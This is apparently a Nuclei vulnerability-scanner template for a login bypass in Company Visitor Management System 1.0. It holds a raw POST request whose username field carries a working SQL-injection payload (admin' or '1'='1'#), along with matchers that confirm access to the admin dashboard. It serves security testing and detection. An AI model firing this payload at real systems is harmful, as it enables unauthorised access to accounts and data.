id: cvms-sqli info: name: Company Visitor Management System (CVMS) 1.0 - SQLi Authentication Bypass author: arafatansari severity: high description: | Company Visitor Management System Login page can be bypassed with a simple SQLi to the username parameter. reference: - https://www.exploit-db.com/exploits/48884 metadata: verified: true tags: cvms,sqli,auth-bypass,cms requests: - raw: - | POST /index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=admin%27+or+%271%27%3D%271%27%23&password=nuclei&login= redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - 'Admin user' - 'Dashboard' - 'CVMS' condition: and - type: status status: - 200